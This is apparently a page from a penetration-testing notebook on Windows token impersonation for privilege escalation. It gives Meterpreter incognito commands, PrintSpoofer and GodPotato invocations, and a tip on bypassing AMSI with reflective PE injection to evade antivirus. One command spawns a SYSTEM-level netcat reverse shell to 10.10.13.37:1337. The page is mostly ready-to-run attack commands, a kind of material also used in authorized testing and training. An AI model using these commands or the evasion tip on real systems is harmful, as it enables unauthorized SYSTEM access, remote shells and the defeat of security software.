> For the complete documentation index, see [llms.txt](https://hacker-mind.gitbook.io/hacker-mind/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacker-mind.gitbook.io/hacker-mind/post-exploit/active-directory/impersonate-token.md).

# Impersonate Token

## Meterpreter Incognito

```
meterpreter > load incognito

#list all tokens
meterpreter > list_tokens -u

#impersonate token
impersonate_token <complete username>

```

## SeImpersonatePrivileges

{% hint style="info" %}
If there is antivirus and you able to bypass AMSI, better use <mark style="background-color:green;">Invoke-ReflectivePEInjection</mark> to perform printspoofer.exe or godpotato.exe

But the tricky part is when the exe need arguments, so the tips is modified the exe and remove the arguments by directly execute to a revershell or something else.
{% endhint %}

This meterpreter will make your live easier:

<https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session>

<pre><code>whoami /priv

<strong># SeImpersonatePrivileges
</strong></code></pre>

### PrintSpoofer

use this -> <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

If you have an **interactive** shell, you can create a new SYSTEM process in your current console.

**Use case**: bind shell, reverse shell, `psexec.py`, etc.

```
.\PrintSpoofer64.exe -i -c cmd
```

or

If you can **execute commands** but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

**Use case**: WinRM, WebShell, `wmiexec.py`, `smbexec.py`, etc.

<pre><code><strong>.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"
</strong></code></pre>

### God Potato (latest one)

{% embed url="<https://github.com/BeichenDream/GodPotato>" %}

<pre><code><strong>.\GodPotato-NET4.exe -cmd "cmd /c whoami" 
</strong></code></pre>

<figure><img src="https://1855963211-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FaDjlLLsWaat1v8p89kgM%2Fuploads%2Fip6pQNaaq13FmpTmm9zT%2Fimage.png?alt=media&amp;token=16ced576-b45b-4529-8732-08429a8d9a52" alt=""><figcaption></figcaption></figure>

reference:

<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens>&#x20;

{% embed url="<https://usersince99.medium.com/windows-privilege-escalation-token-impersonation-seimpersonateprivilege-364b61017070>" %}

{% embed url="<https://github.com/dievus/printspoofer>" %}

## Other Privileges

<https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations>
